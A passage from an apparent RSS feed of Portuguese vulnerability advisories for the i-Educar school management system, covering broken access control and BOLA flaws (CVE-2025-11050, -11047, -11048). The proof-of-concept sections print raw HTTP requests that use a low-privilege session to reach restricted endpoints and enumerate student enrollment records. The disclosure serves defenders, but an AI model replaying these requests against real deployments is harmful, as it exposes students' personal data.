&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Enviar a seguinte requisição:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /periodo-lancamento HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[low_privileged cookie]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Podemos observar que temos acesso à página e à função. E esse usuário não deve fazer isso.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11050/image-2.png&amp;#34;
	width=&amp;#34;967&amp;#34;
	height=&amp;#34;657&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11050/image-2_hu_c45211c19b719ad8.png 480w, /p/cve-2025-11050/image-2_hu_b631283a84602958.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;147&amp;#34;
		data-flex-basis=&amp;#34;353px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11050.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11050.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 27 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11047</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-11047/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-11047/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11047-broken-object-level-authorization-bola-permite-a-enumeração-de-registros-de-alunos-via-moduleapialuno&amp;#34;&amp;gt;CVE-2025-11047: Broken Object Level Authorization (BOLA) permite a enumeração de registros de alunos via &amp;lt;code&amp;gt;/module/Api/aluno&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11047&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11047&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint &amp;lt;code&amp;gt;/module/Api/aluno&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Essa falha permite que usuários com poucos privilégios (por exemplo, contas padrão de alunos/responsáveis) recuperem informações de matrícula (&amp;lt;b&amp;gt;matrículas&amp;lt;/b&amp;gt;) de alunos fora de seu escopo, expondo Informações de Identificação Pessoal (PII) sem as devidas verificações de autorização.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11047-broken-object-level-authorization-bola-permite-a-enumeração-de-registros-de-alunos-via-moduleapialuno&amp;#34;&amp;gt;CVE-2025-11047: Broken Object Level Authorization (BOLA) permite a enumeração de registros de alunos via &amp;lt;code&amp;gt;/module/Api/aluno&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11047&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11047&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint &amp;lt;code&amp;gt;/module/Api/aluno&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Essa falha permite que usuários com poucos privilégios (por exemplo, contas padrão de alunos/responsáveis) recuperem informações de matrícula (&amp;lt;b&amp;gt;matrículas&amp;lt;/b&amp;gt;) de alunos fora de seu escopo, expondo Informações de Identificação Pessoal (PII) sem as devidas verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /module/Api/aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue aplicar a &amp;lt;b&amp;gt;autorização em nível de objeto&amp;lt;/b&amp;gt; ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Comportamento esperado:&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Somente funções autorizadas (por exemplo, administradores, coordenadores, professores vinculados à turma) devem ter acesso a esses dados.&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Usuários não autorizados devem receber a mensagem 403 &amp;#34;Proibido&amp;#34; ou uma resposta vazia.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Comportamento observado:&amp;lt;/br&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Qualquer usuário autenticado (mesmo contas com privilégios baixos) pode acessar este endpoint e recuperar informações confidenciais sobre turmas acadêmicas.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Autentique como um usuário sem privilégios (por exemplo, aluno, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11047/image.png&amp;#34;
	width=&amp;#34;1380&amp;#34;
	height=&amp;#34;528&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11047/image_hu_e9ed6b29581f01dc.png 480w, /p/cve-2025-11047/image_hu_374181a535d27950.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;627px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11047/image-1.png&amp;#34;
	width=&amp;#34;846&amp;#34;
	height=&amp;#34;616&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11047/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-11047/image-1_hu_5d2f89eaf0785474.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;137&amp;#34;
		data-flex-basis=&amp;#34;329px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Envie a seguinte requisição:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Api/aluno?&amp;amp;amp;oper=get&amp;amp;amp;resource=matriculas&amp;amp;amp;aluno_id=206 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: application/json, text/javascript, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/intranet/educar_aluno_det.php?cod_aluno=206
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=[LOW PRIVILEGED COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-11047/image-2.png&amp;#34;
	width=&amp;#34;1345&amp;#34;
	height=&amp;#34;676&amp;#34;
	srcset=&amp;#34;/p/cve-2025-11047/image-2_hu_b56dab6489bf9ba8.png 480w, /p/cve-2025-11047/image-2_hu_146b18df03b3e320.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;198&amp;#34;
		data-flex-basis=&amp;#34;477px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Pudemos observar que informações sobre classes foram retornadas.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a PII sensíveis;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Possível abuso de dados do usuário ou personificação;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Enumeração de usuários.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11047.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11047.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 26 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-11048</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-11048/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-11048/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-11048-controle-de-acesso-quebrado-no-endpoint-consulta-dispensas&amp;#34;&amp;gt;CVE-2025-11048: Controle de Acesso Quebrado no Endpoint &amp;lt;code&amp;gt;/consulta-dispensas&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-11048&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-11048&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Controle de Acesso Quebrado foi identificada no endpoint &amp;lt;code&amp;gt;/consulta-dispensas&amp;lt;/code&amp;gt; do aplicativo i-educar. Essa vulnerabilidade permite que usuários sem as devidas permissões acessem funcionalidades restritas, ignorando as verificações de autorização.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Endpoint Vulnerável:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;GET /consulta-dispensas&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Autenticação:&amp;lt;/b&amp;gt; Obrigatória&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;O aplicativo não consegue validar corretamente as permissões do usuário antes de conceder acesso a este endpoint. Como resultado, até mesmo usuários com privilégios baixos podem acessar com sucesso a funcionalidade destinada apenas a .&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-11048-controle-de-acesso-quebrado-no-endpoint-consulta-dispensas&amp;#34;&amp;gt;CVE-2025-11048: Controle de Acesso Quebrado no Endpoint 